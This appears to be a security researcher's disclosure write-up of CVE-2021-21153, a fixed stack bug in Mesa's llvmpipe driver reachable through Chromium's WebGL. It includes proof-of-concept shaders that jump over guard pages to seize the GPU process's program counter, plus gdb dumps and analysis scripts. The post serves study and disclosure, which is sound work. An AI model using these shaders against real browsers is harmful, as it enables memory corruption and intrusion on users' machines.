In this post, we discuss a bug we came across in Mesa’s llvmpipe Gallium3D graphics driver. The bug was reachable through Chromium’s WebGL implementation and can provide control over the program counter (pc) within Chromium’s GPU process if llvmpipe is used. Llvmpipe is a software rasterizer that is used on Linux if no hardware acceleration (graphics card) is available. This is a rare edge case, as llvmpipe is not widely used: Google estimates that approximately 0.06% of Chromium users are affected. However, as this is a simple but valid Chromium bug, we want to give you a quick walkthrough. The issue is tracked as CVE-2021-21153 and was fixed in February 2021.
As a software rasterizer, llvmpipe leverages LLVM to compile shaders into native code that runs on the CPU. A shader is a small program that is used, e.g., to compute geometry and pixel color values in a 2D/3D scene. This task can be parallelized efficiently. Therefore, llvmpipe uses AVX (Advanced Vector Extensions, the x86 SIMD instruction set extension) to compute up to 8 pixel values in parallel within a single thread. Because the compiled shader is executed directly on the CPU, a vulnerability in shader compilation could result in arbitrary code execution. To check whether you are using llvmpipe, run:
$ glxinfo | grep "OpenGL renderer"
OpenGL renderer string: llvmpipe (LLVM 10.0.0, 256 bits)
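If you want to run this check from a script, the following Python sketch parses the renderer string. The helper names are hypothetical. The lane count simply divides the reported vector width by 32; for the 256 bits shown above, that gives the 8 parallel 32-bit values mentioned earlier. The same regular expression also matches the GL_RENDERER string that Chromium shows on chrome://gpu.

```python
import re
import subprocess
from typing import NamedTuple, Optional


class LlvmpipeInfo(NamedTuple):
    llvm_version: str
    vector_bits: int
    lanes_32bit: int  # how many 32-bit values fit into one vector register


# Matches e.g. "llvmpipe (LLVM 10.0.0, 256 bits)", both in glxinfo output
# and inside Chromium's ANGLE GL_RENDERER string.
_LLVMPIPE_RE = re.compile(r"llvmpipe \(LLVM ([0-9.]+), (\d+) bits\)")


def parse_renderer(renderer: str) -> Optional[LlvmpipeInfo]:
    """Return llvmpipe details from a renderer string, or None if it is not llvmpipe."""
    match = _LLVMPIPE_RE.search(renderer)
    if match is None:
        return None
    bits = int(match.group(2))
    return LlvmpipeInfo(match.group(1), bits, bits // 32)


def query_glxinfo() -> Optional[LlvmpipeInfo]:
    """Run glxinfo (needs an X display) and parse its 'OpenGL renderer string' line."""
    result = subprocess.run(["glxinfo"], capture_output=True, text=True, check=True)
    for line in result.stdout.splitlines():
        if "OpenGL renderer string" in line:
            return parse_renderer(line)
    return None


print(parse_renderer("OpenGL renderer string: llvmpipe (LLVM 10.0.0, 256 bits)"))
# LlvmpipeInfo(llvm_version='10.0.0', vector_bits=256, lanes_32bit=8)
```

On a machine with a running X server, `query_glxinfo()` returns `None` when a hardware driver is active. On Ubuntu, glxinfo is typically provided by the mesa-utils package.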
Arbitrary Stack Allocations using GLSL
Modern browsers ship with a JavaScript API called WebGL, which provides OpenGL bindings for JavaScript to perform 2D/3D rendering. Shaders are written in a subset of the OpenGL Shading Language (GLSL), a C-like language. The WebGL shader language has several limitations, mostly due to security concerns, and the shader compiler applies some optimizations worth keeping in mind:
- Recursive shader functions are not allowed.
- Array indices must be constant; variables are not allowed.
- Small arrays (<16 elements) might be optimized out.
- Functions that are called once will be inlined.
- Everything that is not needed is optimized out.
A major issue in this implementation was that, when Mesa is used, GLSL allows arbitrarily large allocations on the stack. We can define arrays inside a shader and make them quite large. They are allocated on the stack regardless of the stack size of the executing thread. Such shaders can be executed from Chromium using WebGL. An example of such a shader is given in the following:
precision mediump float;
void main(void) {
    int array[0x40000];
    gl_FragColor = vec4(float(array[0]));
}
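A back-of-the-envelope calculation shows why this particular array is a problem. The sketch assumes, as explained later in this post, that llvmpipe stores each int as eight 32-bit lanes. It also assumes that each llvmpipe thread has an 8 MiB stack, which matches the 0x800000-byte stack regions in the vmmap output further down. Neither number is taken from Mesa's source code.

```python
# Assumptions for this sketch (not taken from Mesa's source code):
# every GLSL int is stored as 8 SIMD lanes of 32 bits each, and every
# llvmpipe worker thread has an 8 MiB stack.
LANES = 8
BYTES_PER_LANE = 4
THREAD_STACK_SIZE = 0x800000  # 8 MiB


def array_stack_bytes(num_elements: int, lanes: int = LANES) -> int:
    """Stack space needed for a GLSL int array if each element is a SIMD vector."""
    return num_elements * lanes * BYTES_PER_LANE


scalar_size = array_stack_bytes(0x40000, lanes=1)  # if ints were plain 32-bit values
vector_size = array_stack_bytes(0x40000)           # with 8 lanes per int

print(hex(scalar_size), hex(vector_size))  # 0x100000 0x800000
print(vector_size >= THREAD_STACK_SIZE)    # True
```

Under these assumptions, a scalar array would need only 1 MiB. The vectorized array alone needs the entire 8 MiB thread stack, so the frame cannot fit.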
This fragment shader can then be compiled using the WebGL JavaScript API. Running this shader with WebGL in Chromium, we can observe the following crash of Chromium’s GPU process in dmesg:
llvmpipe-3[3319]: segfault at 7ff275743000 ip 00007ff28407f121 sp 00007ff275742600 error 6
We can take a closer look at what is going on by attaching gdb to the GPU process:
$ ps aux | grep gpu
hammel    3242 [...]/chrome --type=gpu-process [...]
$ sudo gdb -q -ex c --pid 3242
[...]
Thread 3 "llvmpipe-1" received signal SIGSEGV, Segmentation fault.
[Switching to LWP 3317]
[----------------------------------registers-----------------------------------]
RAX: 0xffb8
RBX: 0xffffffff
RCX: 0x0
RDX: 0x0
RSI: 0x20 (' ')
RDI: 0x230
RBP: 0x7ff276f44780 --> 0x0
RSP: 0x7ff276744600 --> 0x0
RIP: 0x7ff28407f121 (mov DWORD PTR [rsp+rdi*4+0x140],edx)
R8 : 0x7ff276f447f0 --> 0x3f80000000000fc0
R9 : 0x7ff276f44810 --> 0x7ff23d9a1740 --> 0xff00ff00ff00ff00
R10: 0x7ff276744620 --> 0x0
R11: 0x1
R12: 0x1
R13: 0x7ff276f44810 --> 0x7ff23d9a1740 --> 0xff00ff00ff00ff00
R14: 0x7ff276f447f0 --> 0x3f80000000000fc0
R15: 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ff28407f115:  test   bl,0x1
   0x7ff28407f118:  jne    0x7ff28407f121
   0x7ff28407f11a:  mov    edx,DWORD PTR [rsp+rdi*4+0x140]
=> 0x7ff28407f121:  mov    DWORD PTR [rsp+rdi*4+0x140],edx
   0x7ff28407f128:  vpextrd edi,xmm6,0x1
   0x7ff28407f12e:  vpextrd ebx,xmm5,0x1
   0x7ff28407f134:  mov    edx,0x0
   0x7ff28407f139:  test   bl,0x1
[------------------------------------stack-------------------------------------]
0000| 0x7ff276744600 --> 0x0
0008| 0x7ff276744608 --> 0x0
0016| 0x7ff276744610 --> 0x0
0024| 0x7ff276744618 --> 0x0
0032| 0x7ff276744620 --> 0x0
0040| 0x7ff276744628 --> 0x0
0048| 0x7ff276744630 --> 0xffffffffffffffff
0056| 0x7ff276744638 --> 0xffffffffffffffff
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007ff28407f121 in ?? ()
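The register dump is enough to compute where the faulting store was headed. The sketch below evaluates the memory operand of the instruction at RIP with the RSP and RDI values from the session. The 4 KiB page size is the usual x86-64 default and is an assumption here.

```python
PAGE_SIZE = 0x1000  # assumption: standard 4 KiB pages

# Register values copied from the gdb session above.
RSP = 0x7FF276744600
RDI = 0x230


def effective_address(base: int, index: int, scale: int, disp: int) -> int:
    """x86 memory operand [base + index*scale + disp]."""
    return base + index * scale + disp


# Faulting instruction: mov DWORD PTR [rsp+rdi*4+0x140], edx
target = effective_address(RSP, RDI, 4, 0x140)

print(hex(target))              # 0x7ff276745000
print(target % PAGE_SIZE == 0)  # True: the store hits the first byte of a page
```

The result is page-aligned. It matches the start of the ---p mapping at 0x7ff276745000 in the vmmap listing below, so the store runs straight into a guard page.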
We crash with an out-of-bounds write within the llvmpipe-1 thread. Llvmpipe creates one worker thread for each available CPU core. The thread list of Chromium’s GPU process looks as follows:
gdb-peda$ info threads
  Id   Target Id                  Frame
  1    LWP 3242 "chrome"          0x00007ff2952d4ad3 in pthread_cond_wait@@[...]
  2    LWP 3316 "llvmpipe-0"      0x00007ff28407f121 in ?? ()
* 3    LWP 3317 "llvmpipe-1"      0x00007ff28407f121 in ?? ()
  4    LWP 3318 "llvmpipe-2"      0x00007ff28407f121 in ?? ()
  5    LWP 3319 "llvmpipe-3"      0x00007ff28407f121 in ?? ()
[...]
By analyzing the RSP register of each llvmpipe thread, we can deduce the following memory layout (the bracketed stack labels are our deductions, not gdb output):
gdb-peda$ vmmap
[...]
0x00007ff274742000 0x00007ff274f42000 rw-p mapped
0x00007ff274f42000 0x00007ff274f43000 ---p mapped
0x00007ff274f43000 0x00007ff275743000 rw-p mapped [stack llvmpipe-3]
0x00007ff275743000 0x00007ff275744000 ---p mapped
0x00007ff275744000 0x00007ff275f44000 rw-p mapped [stack llvmpipe-2]
0x00007ff275f44000 0x00007ff275f45000 ---p mapped
0x00007ff275f45000 0x00007ff276745000 rw-p mapped [stack llvmpipe-1]
0x00007ff276745000 0x00007ff276746000 ---p mapped
0x00007ff276746000 0x00007ff276f46000 rw-p mapped [stack llvmpipe-0]
0x00007ff276f46000 0x00007ff276f47000 ---p mapped
0x00007ff276f47000 0x00007ff277747000 rw-p mapped
The fault address for the llvmpipe-3 thread, as shown in dmesg, is 0x7ff275743000. This address is the first byte of the inaccessible page directly above the stack region that the thread’s stack pointer (sp 00007ff275742600) points into. We can therefore assume that the thread writes sequentially to a huge buffer and crashes because the buffer is larger than the available stack. If you have ever wondered why some processes have memory regions that are neither readable, writable, nor executable: these are so-called guard pages. Their purpose is exactly this: to prevent a sequential read or write (e.g., a buffer overflow) from running into the adjacent mapping. If we could use this bug to write arbitrary data into the adjacent stack, e.g., that of another llvmpipe thread, we could also control a saved return address.
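This reasoning can be checked mechanically. The minimal Python sketch below parses a few lines of the vmmap listing. It then looks up the mapping that contains the dmesg fault address 0x7ff275743000, and the one that contains the stack pointer 0x7ff275742600 from the same dmesg line. The parser is a hypothetical helper that only handles the column layout shown above. The bracketed stack labels are carried over from the listing.

```python
from typing import List, NamedTuple, Optional


class Region(NamedTuple):
    start: int
    end: int
    perms: str
    label: str

    @property
    def size(self) -> int:
        return self.end - self.start

    @property
    def is_guard(self) -> bool:
        # A guard page grants no read, write or execute permission.
        return not any(p in self.perms for p in "rwx")


VMMAP = """\
0x00007ff274f42000 0x00007ff274f43000 ---p mapped
0x00007ff274f43000 0x00007ff275743000 rw-p mapped [stack llvmpipe-3]
0x00007ff275743000 0x00007ff275744000 ---p mapped
0x00007ff275744000 0x00007ff275f44000 rw-p mapped [stack llvmpipe-2]
0x00007ff275f44000 0x00007ff275f45000 ---p mapped
"""


def parse_vmmap(text: str) -> List[Region]:
    regions = []
    for line in text.splitlines():
        fields = line.split(maxsplit=4)
        if len(fields) < 4:
            continue  # skip "[...]" and blank lines
        label = fields[4] if len(fields) == 5 else ""
        regions.append(Region(int(fields[0], 16), int(fields[1], 16), fields[2], label))
    return regions


def find_region(regions: List[Region], addr: int) -> Optional[Region]:
    return next((r for r in regions if r.start <= addr < r.end), None)


regions = parse_vmmap(VMMAP)
hit = find_region(regions, 0x7FF275743000)
print(hex(hit.start), hit.perms, hex(hit.size), hit.is_guard)
# 0x7ff275743000 ---p 0x1000 True
```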
The reason for the out-of-bounds write is not obvious from the shader source above. To understand it, we need to know that Chromium’s WebGL implementation does not pass the GLSL source directly to OpenGL. Instead, the shader is translated first. The translated shader source can be retrieved from JavaScript using gl.getExtension('WEBGL_debug_shaders').getTranslatedShaderSource(shader). For the shader above, the translated source looks as follows:
#version 330
#extension GL_ARB_gpu_shader5 : enable
#extension GL_EXT_gpu_shader5 : enable
out vec4 webgl_FragColor;
void main(){
  (webgl_FragColor = vec4(0.0, 0.0, 0.0, 0.0));
  int _uarray[262144];
  for (int sb5b = 0; (sb5b < 262144); (++sb5b))
  {
    (_uarray[sb5b] = 0);
  }
  (webgl_FragColor = vec4(float(_uarray[42])));
}
Now we can explain the crash above. Chromium does not want WebGL to be usable for leaking memory contents, e.g., by reading uninitialized stack memory. Therefore, every variable, including our array, is zeroed upon declaration. This mitigation gets in our way for an entirely different reason: we cannot simply allocate a large array and overwrite data in the adjacent stack. The for loop that clears the memory causes a segmentation fault when it hits the guard page, long before we can do any harm to the next stack.
Jumping Over Guard Pages
To turn the bug into something useful, we have to allocate enough memory to jump over the guard page without writing to it. For this, we can use the fact that the array is zeroed at its declaration. We can therefore declare an array inside an if statement whose condition always evaluates to false. In that case, the zeroing loop is never executed.
precision mediump float;
void main(void) {
    int array[0x80];
    array[0x18] = 0x1234;
    gl_FragColor = vec4(float(array[0]));
    if (int(array[0]) == 42) {
        int padding[0x40000];
        gl_FragColor += vec4(float(padding[42]));
    }
}
This shader translates to the following code. We can see that the zeroing loop for the padding array is never executed, as it is located inside the if statement.
#version 330
#extension GL_ARB_gpu_shader5 : enable
#extension GL_EXT_gpu_shader5 : enable
out vec4 webgl_FragColor;
void main(){
  (webgl_FragColor = vec4(0.0, 0.0, 0.0, 0.0));
  int _uarray[128];
  for (int sb5c = 0; (sb5c < 128); (++sb5c))
  {
    (_uarray[sb5c] = 0);
  }
  (_uarray[24] = 4660);
  (webgl_FragColor = vec4(float(_uarray[0])));
  if ((int(_uarray[0]) == 42))
  {
    int _upadding[262144];
    for (int sb5d = 0; (sb5d < 262144); (++sb5d))
    {
      (_upadding[sb5d] = 0);
    }
    (webgl_FragColor += vec4(float(_upadding[42])));
  }
}
Keep in mind that the stack frame is allocated on function entry and that its size does not change while the function executes. As a result, even though the padding array is never used, it is allocated on the stack when the shader runs. If we run this shader, we can observe the following crash in dmesg:
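The effect of reserving the whole frame on entry can be illustrated with a simplified model. It is a sketch under several assumptions:

- each int takes eight 32-bit lanes;
- stacks are 8 MiB with a single 4 KiB guard page below them, as in the vmmap output;
- the zeroed array sits at the lowest addresses of the frame;
- the stack pointer on entry equals the RBP value from the gdb session.

Spilled registers and other locals are ignored, and `model_frame` is a hypothetical helper.

```python
from typing import NamedTuple

PAGE_SIZE = 0x1000
STACK_SIZE = 0x800000     # assumption: 8 MiB per thread, as in the vmmap output
LANES, LANE_BYTES = 8, 4  # assumption: one GLSL int = 8 lanes x 32 bits


def vec_bytes(num_ints: int) -> int:
    return num_ints * LANES * LANE_BYTES


class Layout(NamedTuple):
    rsp: int          # stack pointer after the frame is reserved
    write_start: int  # range actually written by the zeroing loop
    write_end: int
    guard_start: int  # guard page directly below this thread's stack
    guard_end: int

    def touches_guard(self) -> bool:
        return self.write_start < self.guard_end and self.guard_start < self.write_end


def model_frame(stack_top: int, sp_on_entry: int, zeroed_ints: int, untouched_ints: int) -> Layout:
    """Hypothetical model: the whole frame is reserved on entry, and only the
    zeroed array, assumed to sit at the bottom of the frame, is ever written."""
    rsp = sp_on_entry - vec_bytes(zeroed_ints) - vec_bytes(untouched_ints)
    guard_end = stack_top - STACK_SIZE
    return Layout(rsp, rsp, rsp + vec_bytes(zeroed_ints), guard_end - PAGE_SIZE, guard_end)


STACK_TOP = 0x7FF276F46000    # upper end of a stack region in the vmmap output
SP_ON_ENTRY = 0x7FF276F44780  # assumption: the RBP value from the gdb session

first = model_frame(STACK_TOP, SP_ON_ENTRY, zeroed_ints=0x40000, untouched_ints=0)
second = model_frame(STACK_TOP, SP_ON_ENTRY, zeroed_ints=0x80, untouched_ints=0x40000)

print(first.touches_guard())                   # True
print(second.touches_guard())                  # False
print(hex(second.rsp), hex(second.write_end))  # 0x7ff276743780 0x7ff276744780
```

In this model, the first shader's zeroing loop must cross the guard page. In the second shader, everything the loop writes lies below the guard page, in the neighboring mapping.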
llvmpipe-3[33381]: segfault at 123400001234 ip 0000123400001234 sp 00007ff43ba28790 error 14
By carefully tuning the offsets, we indeed gain partial control over the program counter. But why is the fault address 0x123400001234 and not 0x1234? As mentioned before, llvmpipe uses AVX instructions to parallelize the shader within a single thread. Therefore, each integer is stored as a vector of eight individual 32-bit values. As we initialize it with a constant, all eight values are 0x1234, and a 64-bit return address that overlaps two adjacent values becomes 0x123400001234.
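The doubled value follows from how the lanes are laid out in memory. The sketch below assumes that the eight 32-bit lanes of a vector are stored consecutively in little-endian order. It also assumes that the overwritten return address overlaps two adjacent lanes. Reading 8 bytes from there then yields the constant in both halves.

```python
import struct


def lanes_to_bytes(lanes):
    """Lay out 32-bit lanes in memory: lane 0 at the lowest address, little-endian."""
    return struct.pack("<%dI" % len(lanes), *lanes)


def read_qword(buf: bytes, offset: int = 0) -> int:
    """Read a little-endian 64-bit value, as `ret` does when popping an address."""
    return struct.unpack_from("<Q", buf, offset)[0]


vector = [0x1234] * 8  # array[0x18] = 0x1234 stores the constant into all 8 lanes
print(hex(read_qword(lanes_to_bytes(vector))))  # 0x123400001234
```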
To gain full pc control, we have to modify the shader a little. As I’m not an expert on this topic, you might want to consult other resources for more details; here, I’ll explain the basic concept. Until now, we used the fragment shader to trigger the vulnerability. The fragment shader is responsible for computing the actual pixel color values. Now we also use the vertex shader to draw a line from -1 to 1 on a 2×2 pixel image. The position within this space is passed to the vertex shader via an attribute, so the resulting fragments sample the values -0.5 and 0.5.
precision mediump float;
attribute float floatAttr;
varying float floatVar;
void main(void) {
    gl_Position = vec4(floatAttr, 0.0, 0.0, 1.0);
    floatVar = floatAttr;
}
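The values -0.5 and 0.5 can be reproduced with a little arithmetic. The sketch assumes the standard viewport mapping: the NDC range [-1, 1] spans the 2-pixel-wide image, and fragments are evaluated at pixel centers. It also assumes that floatAttr is -1 and 1 at the two endpoints of the line. The vertex shader copies floatAttr into both gl_Position.x and floatVar, and w is 1. The interpolated floatVar therefore equals the x coordinate of each pixel center.

```python
def pixel_centers_ndc(width: int):
    """x coordinate (in normalized device coordinates) of each pixel center in a row."""
    return [2.0 * (i + 0.5) / width - 1.0 for i in range(width)]


def interpolate(a0: float, a1: float, x0: float, x1: float, x: float) -> float:
    """Linearly interpolate an attribute that is a0 at x0 and a1 at x1."""
    t = (x - x0) / (x1 - x0)
    return a0 + t * (a1 - a0)


centers = pixel_centers_ndc(2)
samples = [interpolate(-1.0, 1.0, -1.0, 1.0, x) for x in centers]
print(centers)  # [-0.5, 0.5]
print(samples)  # [-0.5, 0.5]
```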
We use the varying variable floatVar to pass the sampled attribute from the vertex shader to the fragment shader. There, it can be used to distinguish the two cases and create the desired pattern in memory that controls the upper and lower halves of the pc. There is probably an easier and cleaner way to accomplish this; however, it did the job.
varying float floatVar;
[...]
if (floatVar > 0.)
    array[0x18] = 0x4344;
else
    array[0x18] = 0x45464748;
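The sketch below shows how per-lane values can combine into one 64-bit address. The mapping of samples to lanes is a hypothetical assumption. It is chosen so that lane 0 takes the else branch and lane 1 the if branch, which is the combination the dmesg output below implies. The sketch also checks one practical constraint: the upper lane must stay small enough for the result to be a user-space address on x86-64 with 4-level paging.

```python
import struct

CANONICAL_USER_LIMIT = 0x0000800000000000  # user-space limit on x86-64, 4-level paging


def select_per_lane(samples, if_true, if_false):
    """Emulate `if (floatVar > 0.) ... else ...` evaluated independently per lane."""
    return [if_true if s > 0.0 else if_false for s in samples]


def qword_at_lane(lanes, lane: int = 0) -> int:
    """Read the 64-bit value formed by lanes `lane` and `lane + 1` (little-endian)."""
    buf = struct.pack("<%dI" % len(lanes), *lanes)
    return struct.unpack_from("<Q", buf, lane * 4)[0]


# Hypothetical lane assignment: even lanes see floatVar = -0.5, odd lanes 0.5.
samples = [-0.5, 0.5] * 4
vector = select_per_lane(samples, 0x4344, 0x45464748)
target = qword_at_lane(vector)

print(hex(target))                    # 0x434445464748
print(target < CANONICAL_USER_LIMIT)  # True
```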
When running the proof of concept again with the modified shader, we get the following result in dmesg which shows we have full pc control:
llvmpipe-3[50590]: segfault at 434445464748 ip 0000434445464748 sp 00007f0934bbc850 error 14 in chrome[562d7fe65000+2fc7000]
Conclusion
This is indeed a valid vulnerability that can be used to gain pc control. However, full RCE is a different story. First, the GPU process runs within a sandbox, so an additional vulnerability is required to gain full system control. Second, due to ASLR, an information leak is required. This bug, however, does not provide a trivial way of leaking memory, as the memory is zeroed before we can read it.
As the bug is already fixed, a vulnerable version can be obtained from here. The proofs of concept are attached to this post and should work on Ubuntu 20.04 (Edit: There were some updates. Visit chrome://gpu and search for GL_RENDERER. Version “ANGLE (VMware, Inc., llvmpipe (LLVM 10.0.0, 256 bits), OpenGL 3.3 core)” and prior should work). By default, llvmpipe is only used if no hardware acceleration is available, e.g., in a virtualized environment. Chromium, however, falls back to its own (non-vulnerable) SwiftShader renderer if llvmpipe crashes too often; in that case, Chromium has to be restarted. To force the use of llvmpipe, you can set the following environment variables (thanks, Chromium team):
export LIBGL_ALWAYS_SOFTWARE=1
export GALLIUM_DRIVER=llvmpipe
./chrome